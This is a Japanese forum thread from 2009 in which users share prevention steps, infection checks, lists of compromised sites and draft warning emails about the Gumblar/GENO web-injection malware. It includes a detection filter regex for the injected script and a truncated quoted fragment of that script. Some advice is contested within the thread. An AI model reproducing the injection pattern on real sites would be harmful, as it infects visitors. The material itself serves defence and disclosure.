09/05/16 14:07:34 EILz2Sb70
感染予防対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.NoScriptの導入(Firefoxの導入)
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.危険IPのブロック
諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例
1.Adobe Readerを起動し「編集」メニューの「環境設定」
「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す)
OKを押して設定確定後、Adobe Readerを終了。
↓
2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
設定は SpeedUp - Fast がおすすめ。
注意すべきは
Acroform(拡張子なし)
Annotations(拡張子なし)
これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。
そうしないと Adobe Reader が起動しなかったりする。
このとき追加作業として
EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと
より安心かもしれない。
以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reader以外の環境設定をどうするかも各自考える必要があります。
3:192.168.0.774
09/05/16 14:08:00 EILz2Sb70
以下攻撃されたサイト
小林製薬
URLリンク(www.kobayashi.co.jp)
国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】
4:192.168.0.774
09/05/16 14:08:20 EILz2Sb70
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。
インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
※検出率が上がる頃には次の種類になっている
感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
URLリンク(www3.atword.jp)
5:192.168.0.774
09/05/16 14:08:46 EILz2Sb70
【感染の確認方法】
①cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したら②へ
②sqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
③avast!(無料のアンチウイルスソフト)で確認
6:192.168.0.774
09/05/16 14:09:24 EILz2Sb70
Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。
初心者や質問がある方は
スレリンク(doujin板)
上記のスレに行くと優しく教えてくれるかもです
Adobe Flash Player バージョンテスト
URLリンク(www.adobe.com)
7:192.168.0.774
09/05/16 14:10:56 hzDONx9U0
改竄されたsqlsodbc.chmは
サイズが1.29 KB (1,323 バイト)
更新日は2009年3月21日
8:192.168.0.774
09/05/16 14:14:11 cmMngAoD0
亜種があるから>>7でないからと言って絶対に白だとはいえないが、
>>7だったら100%黒
9:192.168.0.774
09/05/16 14:14:14 v6iqPVHwP
現行スレ
同人板
【管理も】同人サイト・GENOウィルス注意2【閲覧も】
スレリンク(doujin板)
セキュリティ板
GENOウイルススレ ★5(実質★6)
スレリンク(sec板)
10:192.168.0.774
09/05/16 14:16:50 EILz2Sb70
>>1
スレ立て乙でした。
テンプレはこんなものですか
11:192.168.0.774
09/05/16 14:18:10 hzDONx9U0
ageていきましょう
12:192.168.0.774
09/05/16 14:20:02 uAe98uZ60
ん?もう書いてええのん?
13:192.168.0.774
09/05/16 14:31:58 tn4HDAid0
IPブロックの纏めテキストと、PG2での導入方法等も纏めた方がよさげか
14:192.168.0.774
09/05/16 14:37:33 v6iqPVHwP
まとめると
サイトを開く
↓
htmlに書かれたjsコードが実行される
↓
別サイトへジャンプ?ファイル名.exeが実行される<ここでvistaならUACが出るはず
↓
実行すると感染?C:\WINDOWS\system32\sqlsodbc.chmが上書きされる。<vistaの場合はC:\Windows\Help\mui\sqlsodbc.chm
↓
regedit.exe,cmd.exeが起動しなくなる?特定のサイトへのアクセス不可。
↓
オワタ
こんな感じでいいのかな。
で同人板の奴は感染した状態でFPTのサイトを更新しちゃうとパスワードとか抜かれて不正にサイトが書き換えられてしまう
って事でいいのかな?今北で情報が多くてよくわからん
15:192.168.0.774
09/05/16 14:38:39 ayXPZTg40
スレリンク(poverty板)
これは既出?もう用無し?
16:192.168.0.774
09/05/16 14:47:30 arP7FdRW0
こんなときだからこそ
リンク先の内容も一緒に貼って欲しい
17:192.168.0.774
09/05/16 14:50:03 ayXPZTg40
ごめん。内容はコレ↓
【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
1 : 番組の途中ですがアフィ禁止です :2009/05/15(金) 12:44:31 ID:QP0LhXxzP
ソース (p)スレリンク(sec板)
対策と駆除はこちら (p)URLリンク(www29.atwiki.jp)
Adobe Reader/Flashのアップデートをお忘れ無く (p)URLリンク(www.adobe.com)
745 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:30:27
てかニフティで検索するのに
ニフティ感染してるの????
746 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:31:09
>>745
( ゚Д゚)
何だと・・・?
748 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:34:45
>>746
前のレスにも出てるけど(p)URLリンク(www3.atword.jp)のサイトにかいてある
(中略)
ニフティサーブ ネットワーク(ニフティ株式会社さん
61.121.100.119
の該当データの停止を行ってください。何度Mail送っても反応無いので・・・・・
749 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:37:17
>>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz
早く寝てしまいたい…
750 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:08
ニフティにアクセスしたらアウトなの?
751 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:38:45
ニフティのセキュリティ情報サイトさっき見たばかりなんd
752 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:44
マジでヤバイなこれw
753 名前:名無しさん@お腹いっぱい。 投稿日:2009/05/15(金) 04:39:58
ニフティ今朝アクセスしたばっかり・・・。うwぁああああああああああああああ
18:192.168.0.774
09/05/16 14:51:25 ayXPZTg40
あー・・もうなんかグダグダorz許して
19:192.168.0.774
09/05/16 14:53:44 gMiU0OeL0
勘違いする人が増えるような貼りかた止めろ
それ@niftyがホストしてるサイトの一部にってことだろ
20:192.168.0.774
09/05/16 14:55:51 ayXPZTg40
そうなのか。騒いでごめんなさい
21:192.168.0.774
09/05/16 15:12:09 v6iqPVHwP
フィルター始めて作ってみたけどどうだろ。
name
test
match
(function([^>]++){var\s[^>]++='%';var\s[^>]++.replace([^>]+);eval(unescape([)]+))})(/,/g);
replace
<!-- type hidden --!>
22:192.168.0.774
09/05/16 16:39:00 +Kk3rzau0
ニュー速もきましたよ
スレリンク(news板)
23:192.168.0.774
09/05/16 16:58:38 OzJB1Y+z0
何かギスギスしてんな
24:192.168.0.774
09/05/16 18:08:57 L69MESm3O
>>1
乙
25:192.168.0.774
09/05/16 18:12:33 v6iqPVHwP
どうやらここが次スレになるらしい
あぼん出来るし良かった
26:192.168.0.774
09/05/16 18:17:17 cXEySQE80
>>25
向こうに7立ったみたいw
27:192.168.0.774
09/05/16 18:19:07 zXe/9KrE0
俺が立てといた
窓口は多い方がいいと思ってね
28:192.168.0.774
09/05/16 18:21:17 v6iqPVHwP
>>27
随分と荒れた窓口だな
29:192.168.0.774
09/05/16 18:25:02 H7YmOp+10
隔離スレにもなりゃしねぇ
30:192.168.0.774
09/05/16 18:57:13 zXe/9KrE0
俺は普通に波風タタサズニ立てたかったんだけどね
31:192.168.0.774
09/05/16 23:10:45 WN9EdhyZ0
むしろこっちはまったりやればいい
32:192.168.0.774
09/05/17 11:37:22 T9pTie3x0
セキュ板が荒れたので情報まとまらない。
こっちへ移動してきた。ヨロ。
33:192.168.0.774
09/05/17 11:37:51 QnwsxDv40
同じく、よろ。
34:192.168.0.774
09/05/17 11:39:21 MP/sWvjo0
俺もこっちにしよう
35:192.168.0.774
09/05/17 11:40:45 ma6xyjDQ0
ヤレヤレ。こっちまで追いかけてこないでくれればいいんだけど。
36:192.168.0.774
09/05/17 11:40:51 FkD7jhlA0
同人板からきました\(^O^)/
37:192.168.0.774
09/05/17 11:40:59 dj6spVc50
変な奴もまとめてこっちに来ればいい
まとめてNGできるし
38:192.168.0.774
09/05/17 11:41:36 MP/sWvjo0
コレ、テンプレ追加でいい?
GENOのウイルスサイトチェッカー完成した
URLリンク(geno.2ch.tc)
39:192.168.0.774
09/05/17 11:42:52 DhBs/7gt0
いいんじゃね
40:192.168.0.774
09/05/17 11:43:25 5zpzhS0v0
必要な情報は上で揃ってるな
特に追加するようなことは今のところないよね?
41:192.168.0.774
09/05/17 11:44:03 T9pTie3x0
向こうの最後の方ににあった感染サイト
うこっけい?とかあの辺ってもうまとめに入ってるのかな?
42:192.168.0.774
09/05/17 11:44:21 gUnnPMxe0
・なんらかの方法によるサーバへの侵入
FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・Webサイトの改ざん
具体的にはdocument.write(unescape('%3CsI0cTJrZliptのようなスクリプトコードを
各ページに埋め込まれます。
%3CsI0cTJrZliptの部分については異なるパターンもあったようです。
・そのほかの詳細は不明です
発見方法
・公開しているすべてのページに該当スクリプトコードが埋め込まれているか
確認してください。その他の影響については詳細不明です。
対処
感染WebサイトについてはOS,Webサーバソフトが多岐にわたっており
管理FTPパスワードの漏洩なのかSQLインジェクション等の
Webアプリ脆弱性を攻撃されたものなのかわかっていません。
改ざんされたスクリプトコードの削除だけで済む問題ではなく
侵入された経路の究明および対策が必要となってくると思われます。
43:192.168.0.774
09/05/17 11:45:27 QnwsxDv40
何か変化起きた時のために保守気味で進行でいんじゃね?
先週金曜まではそうだったし。
saymoveと同人が来てから無駄に加速したね。
44:192.168.0.774
09/05/17 11:45:48 Sggs+C2i0
>>38
ありがとう助かります。
何せ外部リンクを結構チェックしないといけないので
45:192.168.0.774
09/05/17 11:46:35 dj6spVc50
同人というより鬼の首とったように
質問してる奴は腐腐言ってるやつの方が厄介だった気がする
46:192.168.0.774
09/05/17 11:48:59 T9pTie3x0
静けさが嘘のようだw
47:192.168.0.774
09/05/17 11:50:50 6zykGUMd0
よろしくー
48:192.168.0.774
09/05/17 11:51:08 MP/sWvjo0
ID出るだけでこうも違うとはw
>>44
作者さんに言ってあげて。俺、単なる間違い指摘入れただけの人だから。
49:192.168.0.774
09/05/17 11:51:42 rsI8zkAT0
移動完了
50:192.168.0.774
09/05/17 11:53:03 6zykGUMd0
烏骨鶏は凸電誰かしましたか?
放置しておくと大変なことになる
51:192.168.0.774
09/05/17 11:53:07 ffQj4EqF0
AdobeAcrobatReaderのJavaScriptの脆弱性って、今年の3月にver.9.1で修正されたものと、
5月にver.9.1.1で修正されたものの2種類あるんだが、
いわゆるGENOウイルスってどちらの脆弱性ついたんだろうな。
もちろんどの脆弱性が塞がれているから安心ってのは無いけど、情報として知っておきたい。
52:192.168.0.774
09/05/17 11:56:19 /tk9oSEO0
>>50
電話番号書いてあるのは公式HPぐらい。
缶切りが缶詰の中に入ってる状態とはこの事
53:192.168.0.774
09/05/17 11:57:28 vLbMFr+GP
誰かタウンページ持ってこい
54:192.168.0.774
09/05/17 11:59:04 T9pTie3x0
>>50
流れちゃってわかんないけど、もいっこあった希ガス
55:あっちのスレの42
09/05/17 11:59:23 2KRNOGSH0
>>51
9.1.1で修正された方だと思っていたが・・・。
56:192.168.0.774
09/05/17 11:59:46 6zykGUMd0
ver.9.1ではバッファーオーバーフローの脆弱性あったよね
ver.9.1.1でそれを解決したんじゃない
57:192.168.0.774
09/05/17 12:01:29 Sggs+C2i0 BE:762340739-S★(634668)
これいいかな?
URLリンク(tvsurf.jp)
58:192.168.0.774
09/05/17 12:01:52 ffQj4EqF0
>>55
あっちのスレの42さんか、俺はてっきり9.1修正のほうだと思ってたんで、逆に42さんの書き込みみてどうしたものかと思った口なんだ。
いまのところ、ウイルス対策ベンダにも2chも情報が少ない状態過ぎる。
59:192.168.0.774
09/05/17 12:02:30 2KRNOGSH0
ダメだ。あっちのスレでこっちに誘導してる・・・。
60:192.168.0.774
09/05/17 12:04:01 0Et/Qq5U0
>>59
>>37
61:192.168.0.774
09/05/17 12:04:03 MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認
62:192.168.0.774
09/05/17 12:05:20 6zykGUMd0
>>61
今日は休みじゃないかな?
63:192.168.0.774
09/05/17 12:06:39 2KRNOGSH0
>>59
いや、俺の思い込みかもしれない。
9.1の脆弱性をついた攻撃が既に広まっていたから、adobeが大急ぎで作ったのが9.1.1だったはず。
GENOのとタイミングが合っていたから 9.1の方ってのは可能性も考えてなかった。
情報は本当に少ないね。
64:192.168.0.774
09/05/17 12:09:32 T9pTie3x0
>>61
うこっけい
URLリンク(www.100bangai.co.jp)
これか?お菓子やさんだったの・・・?
googleからurl検索したらavastさんが怒って焦ったw
65:192.168.0.774
09/05/17 12:21:14 6zykGUMd0
61 名前:192.168.0.774[sage] 投稿日:2009/05/17(日) 12:04:03 ID:MP/sWvjo0
>>54 コピペだけどこれかな?
hXXp://www.seibidoshuppan.co.jp/
感染確認 ここは出版社
烏骨鶏はhxxp://www.ukokkei.co.jp/
フリーダイアルしか載ってないな、受注オペレーターじゃ話にならないし ><
66:192.168.0.774
09/05/17 12:23:41 T9pTie3x0
>>65
>>64に載ってるよ。多分それ。そこは踏んでも平気。
ukokkeiのurlで検索するとトロイ検出するから気をつけてw
店舗のメアドがない
67:192.168.0.774
09/05/17 12:26:11 MP/sWvjo0
>>65
せいびどう出版社って何処だか知らないけど、オペレーターに訳を説明して
TEL転送とか、電話先を教えてくれるんじゃない?
68:192.168.0.774
09/05/17 12:28:00 PUr+H3m+0
「お宅のHPを見たらウィルスの警告が出てくる。
どういうわけか説明してもらいたい。」
って言えば良いんじゃない?
69:192.168.0.774
09/05/17 12:29:48 T9pTie3x0
本名で教えても良いけど、ウイルス食らっちゃうような店に
言っても解るとも思えないし、下手したら自分が変質者扱いだろうな・・・
でも専門店街代表のメールしかないからメールしてもその人たちが踏んじゃいそう
70:192.168.0.774
09/05/17 12:31:42 6zykGUMd0
こことhxxp://www.ukokkei.co.jp/
専門店街は住所が違うよ
71:192.168.0.774
09/05/17 12:32:07 xG23ce6c0
>>5
感染者がcmd.exeを起動してはダメというレスを別板で見たんだが
このテンプレはこれでいいのか?
72:192.168.0.774
09/05/17 12:32:20 2KRNOGSH0
IPAも平日しか働いていないのか・・・。
受付時間:平日10:00~12:00、13:30~17:00
73:192.168.0.774
09/05/17 12:37:07 6zykGUMd0
とりあえずフリーダイアルで電話して
責任者読んで説明してみる
74:192.168.0.774
09/05/17 12:38:07 PUr+H3m+0
>>73
お前が失敗すると後から凸っても全部悪戯扱いだからな。
それなりに頑張れ
75:192.168.0.774
09/05/17 12:39:36 T9pTie3x0
>>73
フリーダイアルは専門店街のやつ?
76:192.168.0.774
09/05/17 12:41:04 6zykGUMd0
>>75
www.ukokkei.co.jp/ ここ
77:192.168.0.774
09/05/17 12:42:49 T9pTie3x0
>>74
プレッシャーかけんなww
so-netの説明がそれなりに説得力あるけど
URLリンク(www.so-net.ne.jp)
電話だとえっちてーてーぴー.って言わないとダメだな
まぁ焦って一軒閉鎖した所で・・・・・・・・・・(´・ω・`)
78:192.168.0.774
09/05/17 12:43:13 6zykGUMd0
【本店】のフリーダイヤル
79:192.168.0.774
09/05/17 12:45:11 2KRNOGSH0
>>71
たしかに感染サイトのお詫び文には
cmd 起動でエクスプローラーが落ちてregeditが起動できなくなるって書いてあったな。
ウィルスを無効化する方法も書いてあったけど、
あっちスレに転載すると、とんでもないことになりそうだからやめといた。
その方法で本当に無効化できるのかも分からんし、regeditで失敗されても困るし。
バックドアやダウンローダーが入り込んでいれば、仮に無効化できてもいつまで効くか分からないしね。
80:192.168.0.774
09/05/17 12:45:45 PUr+H3m+0
電凸用のテンプレも必要になってくるのかな?
>>77へ
・GENOウィルスというコンピュータウィルスがある。
・Adobe Readerと言う文章読むプログラムの脆弱性を利用し感染する。
・感染したPCでホームページを更新すると、その時にパスワード等を盗み出してしまう。
・盗み出したパスワードでホームページを表示は元のまま、ウィルスのコードが書き加えられてしまう。
・現在お宅のホームページは書き換えられている。
・ソネットで詳しく説明されているので、ホームページの更新担当の人にこの情報を伝えて欲しい。
81:192.168.0.774
09/05/17 12:47:00 6zykGUMd0
電話でない罠>本店
82:192.168.0.774
09/05/17 12:49:33 T9pTie3x0
>>80
正攻法ならそれでいいんじゃない?
・ホームページを見た人が感染する
製作が別会社とか相手がアレだとGENO状態になるかもしれないけど
大手がやられて閉鎖してるってのは入れておいた方が良いとおもうw
so-net読んでもわからんかもね
83:192.168.0.774
09/05/17 12:54:36 c9IgsGG/0
出版社のHPはいろんな大手書店が発注やら在庫確認なんかで使用するので
ものすごいことになると予想
普通に店頭のPCで開いて客に見せたりするからね
84:192.168.0.774
09/05/17 12:55:41 +3+vFr3c0
wiki重いぬ
85:192.168.0.774
09/05/17 12:57:28 ytTR6LEA0
烏骨鶏と出版社のWhoisを調べる。
86:192.168.0.774
09/05/17 12:58:45 Um/4qeYR0
成美堂出版が感染しました
87:192.168.0.774
09/05/17 12:59:12 6zykGUMd0
a. [ドメイン名] UKOKKEI.CO.JP
e. [そしきめい] かぶしきがいしゃ うこっけい
f. [組織名] 株式会社烏骨鶏
g. [Organization] ukokkei,co.,Ltd.
k. [組織種別] 株式会社
l. [Organization Type] Company
m. [登録担当者] MU2056JP
n. [技術連絡担当者] DT033JP
p. [ネームサーバ] ns1.webhosting-jp.com
p. [ネームサーバ] ns2.webhosting-jp.com
[状態] Connected (2009/11/30)
[登録年月日] 2004/11/16
[接続年月日] 2004/11/16
[最終更新] 2009/03/02 17:40:12 (JST)
88:192.168.0.774
09/05/17 12:59:17 mJUiMCyk0
>>3の下の報告もここでいいのか?
邪魔になってない?
89:192.168.0.774
09/05/17 13:01:24 ytTR6LEA0
>>87
Whoisの結果のこの下に担当者と連絡先
があったような気がするのだが。
90:192.168.0.774
09/05/17 13:01:40 Sggs+C2i0 BE:508227629-S★(634671)
>>88
向こうのスレを見ていると機能していないんですよね
91:192.168.0.774
09/05/17 13:02:58 6zykGUMd0
>>89
それが無いです
92:192.168.0.774
09/05/17 13:05:32 T9pTie3x0
>>87
あるよ。
担当者名とメールアドレス
ここに晒しちゃまずいかな?
レン鯖はフューチャースピリッツ
93:192.168.0.774
09/05/17 13:05:40 ilxyL7Fy0
>>5
>③avast!(無料のアンチウイルスソフト)で確認
これ違う。感染後の確認には使えない。
avastは、感染を撒き散らしているサイトのスクリプトの大半に反応するので、ブロックできる
可能性が高いというだけ。(感染しているのにすり抜けるページも幾つか確認しているので、
完全には信用できない)
すり抜けて本体が落とされてしまった場合、Avastで検索しても見つからない可能性が高い。
(ほぼ日替わりで本体が入れ代わっており、入れ代わった後のパターン対応はどこの
セキュリティソフトベンダーでも追い付いていない)
予防法としては、Avastで感染サイトを訪問すると反応する(いくらかのすり抜けは発生する)ので
チェック可能。但し、すり抜けた時はがっつり感染するので自己責任。
幾つかのベンダーが行なっている本体の置かれているサイトをFW機能でブロックするのが
一番確実な方法。FW機能のないセキュリティソフトの場合、PG2の併用によってブロックするのが有効。
但し、本体の置かれるアドレスが変更になった場合(先週の金曜日辺りに入れ代わったんだっけ?)
ブロック対象の指定を追加しなければいけない。
スクリプトを検知するAvastの方式も、IP範囲をブロックするカスペ等の方式も、両方完璧ではないが
予防法としては一定の効果が見込めるというだけ。
94:192.168.0.774
09/05/17 13:06:06 ytTR6LEA0
>>91
昔調べたときあったと思ったのだなあ。
Whoisがそれでトラブルがあったとしか記憶がない。
ないならしょうがないか。
ありがとう。
95:192.168.0.774
09/05/17 13:06:43 6zykGUMd0
>>92
あった?Whoisは公開されてるものだからいいでしょ
96:192.168.0.774
09/05/17 13:07:39 ytTR6LEA0
>>92
>担当者名とメールアドレス
>レン鯖はフューチャースピリッツ
そこに警告のメールを送ってみるしかないだろうね。
97:192.168.0.774
09/05/17 13:08:17 IjPG7tgR0
>>80
素人向けには難しい言葉ばかりだな。
・GENOウィルスというコンピュータウィルスがある。
・pdfファイルを読むプログラムに問題があり感染する。
・現在御社のホームページは書き換えられ、GENOウィルスが仕込まれている。
・総務部門かホームページの担当者にこの情報を伝えて欲しい。
これぐらいでいいんじゃね?
98:192.168.0.774
09/05/17 13:08:53 6zykGUMd0
>>92
Whoisクライアント何使ってるんですか?
99:192.168.0.774
09/05/17 13:08:58 mJUiMCyk0
>>90
煽りや質問多いもんな
100:192.168.0.774
09/05/17 13:09:52 2KRNOGSH0
>>88
スレがあんなにヒドイことになると思わずに立ったスレだから、
仕方ないよね。
>>96
名前と電話番号
みっけた。
けど、ここに書いて本当にいいのか俺には分からない。
101:192.168.0.774
09/05/17 13:10:13 T9pTie3x0
>>95
URLリンク(whois.ansi.co.jp)
店舗のメールだね
102:192.168.0.774
09/05/17 13:10:15 um/XFnMU0
>>97
pdfなんて拡張子伝えられても訳ワカメだと思ったんでAdobe Readerって名前入れておいた。
それ以外に関してはそれでも良いかもだけど、その程度の情報だと今度は怪しい勧誘みたいにも聞える
103:192.168.0.774
09/05/17 13:10:30 7TaPV4fL0
>>93
やっぱ現段階ではNoScript必須ですな。
JavaScriptを利用しない形式に変わったらそれすら無効ですが・・・。
104:192.168.0.774
09/05/17 13:11:54 T9pTie3x0
>>97
2番目が難しいと思う
見た人(顧客)が感染するって入れた方がいいんでない
105:192.168.0.774
09/05/17 13:11:57 ilxyL7Fy0
>>42
>・なんらかの方法によるサーバへの侵入
>FTPパスワードの漏洩なのかWebアプリの改ざんなのかは不明です。
・セキュ板のGENOスレの1か2辺りで、ローカルにしか繋いでいないサーバーのhtmlが書き換えられたという報告
(動作中のマルウェアが行なっているのか、外部からのバックドア経由の操作なのかは不明)
・ftpログを見たら、海外からのアクセスで改変が行われていたという報告(ftpパスは漏洩していると考えるべき)
・動作解説してるサイトの翻訳では、感染PCがゾンビ化するというものがあったので、BOTネットに組込まれている
可能性があり、そちらから操作される可能性がある
こんな感じかな。
106:192.168.0.774
09/05/17 13:12:03 I5G8A/p20
>>98
URLリンク(whois.jprs.jp)
でWhois検索すると、登録担当者と技術担当者のIDがリンクで出てくるのでそれをポチっと。
107:192.168.0.774
09/05/17 13:13:30 ytTR6LEA0
>>100
感染したサイトの会社に連絡つかないと
そこしか通報するしかないからねえ。
とりあえず、文章だけども考えておかないと。
108:192.168.0.774
09/05/17 13:13:49 6zykGUMd0
>>106
あり~
109:192.168.0.774
09/05/17 13:16:03 ilxyL7Fy0
○○○○ ご担当者さま
■ お願い
御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。
同様のスクリプトの仕込まれたHPを閲覧することで感染したPCを利用して、
HPの更新作業を行なったため、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)
現在の状況になっているものと思われます。
これは、先日、小林製薬のHPで発生したものと同じものと思われますので
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知を
行なって頂けないでしょうか。
下記のXXXXXにて報告があり、当方でも確認したところ、確かに危険コードが
含まれておりました。HP閲覧者のPCにウイルスが勝手にダウンロードされて
しまうため、御社のHPが意図せぬ加害者となっております。
(感染報告のあったスレッド等のアドレス)
HP更新に使用したPCがマルウェア(通称zlkon・GENOウイルス)に感染していると思われます。
■ 確認した感染ページ
(わかる範囲で記載)
<多分、全てのページが感染中>
●HTMLファイルの場合
<body>タグの直前に難読化されたコードが埋め込まれる。
●PHPの場合
ファイルの最初に難読化されたコードが埋め込まれる。
●JSの場合
ファイルの最後に難読化されたコードが埋め込まれる。
その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
110:192.168.0.774
09/05/17 13:17:21 T9pTie3x0
>>109
俺が担当なら読まないで捨てるww
so-net貼ってあげたら?
111:192.168.0.774
09/05/17 13:17:22 ilxyL7Fy0
■感染していると思われるページの危険部分
(一応、ページによって内容異なるので、ソースチェッカーなり、
IE以外のブラウザでview-source:~ で確認したものを貼り付ける)
|<script language=javascript><!--
|(function(){var UkRR='%';var WdBp=('v&61r&20a&3d&22S&63<以下省略>
| --></script>
■ 感染していると思われるウイルスの情報
下記のサイトの情報にあるマルウェアによるものと思われます。
これは、Web閲覧で知らぬうちに導入されてしまうものです。
URLリンク(www.so-net.ne.jp)
URLリンク(www.so-net.ne.jp)
URLリンク(www.kobayashi.co.jp)
URLリンク(www29.atwiki.jp)
(↓はちょっと専門的な解説です)
URLリンク(ilion.blog.shinobi.jp)
URLリンク(www.itmedia.co.jp)
このマルウェアに感染したPCで、FTP接続しファイルを更新すると、動作中の
マルウェアが、感染サイトを呼び出すスクリプトを勝手に挿入してしまうため、
現在の状況になっているものと思われます。
PC内のアップロード前のファイルには、現在でも危険なコードは含まれて
いない筈ですので、PC復旧作業に入る前に、なんらかのメディアに
バックアップをとっておくと良いでしょう。
■ 解決方法について
駆除方法
URLリンク(www29.atwiki.jp)
一度感染してしまうと、PC稼動状態で除去するのは困難ですので、必要なデータを
バックアップした後で、PCリカバリもしくはOS再インストールを行なって、
安全な環境にしてください。(IDとかパスワードのメモやブックマークも
忘れずにバックアップを)
OS再インストール(またはPCリカバリ)の後、WindowsUpdateを全て当てて、
セキュリティソフトを導入し、パターンを最新にした上で、各種アプリの
インストールや、バックアップしたデータの書き戻しを行なってください。
安全なPCから、不正なスクリプトを含まないhtmファイルをアップロードすることで
HPは正常な状態に戻ると思われます。
ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
112:192.168.0.774
09/05/17 13:18:24 ilxyL7Fy0
(以下を付けるかどうかはお好みで)
■再発防止策
WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、URLリンク(www29.atwiki.jp)の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。
感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。
■私見による蛇足
小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
URLリンク(www.kobayashi.co.jp)
また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。
以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
113:192.168.0.774
09/05/17 13:19:27 ilxyL7Fy0
>>109,>111-112
昨日、みかけた範囲の感染サイト管理者に送ったメールのコピペ。
テンプレの叩き台にでもどうぞ。
114:192.168.0.774
09/05/17 13:19:43 mJUiMCyk0
>>90
>>100
スレリンク(sec板:907番)
長くなっちったから
ぬっちしたアドレスだけ置いとく ありがとう
115:192.168.0.774
09/05/17 13:19:59 AvccT1I50
ID:ilxyL7Fy0さん乙です
116:192.168.0.774
09/05/17 13:20:16 Sggs+C2i0
>>112
最初に小林製薬が感染したと同じウィルスと入れた方がインパクトがあるように思いますが
117:192.168.0.774
09/05/17 13:21:09 6zykGUMd0
>>109
文才ありますねー、それで送ってください
118:192.168.0.774
09/05/17 13:21:44 GRfaSwDkP
>>116
製薬会社がウィルスに感染したとかとんでもないしな
119:192.168.0.774
09/05/17 13:22:42 T9pTie3x0
>>113
いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
120:192.168.0.774
09/05/17 13:24:51 2KRNOGSH0
>>107
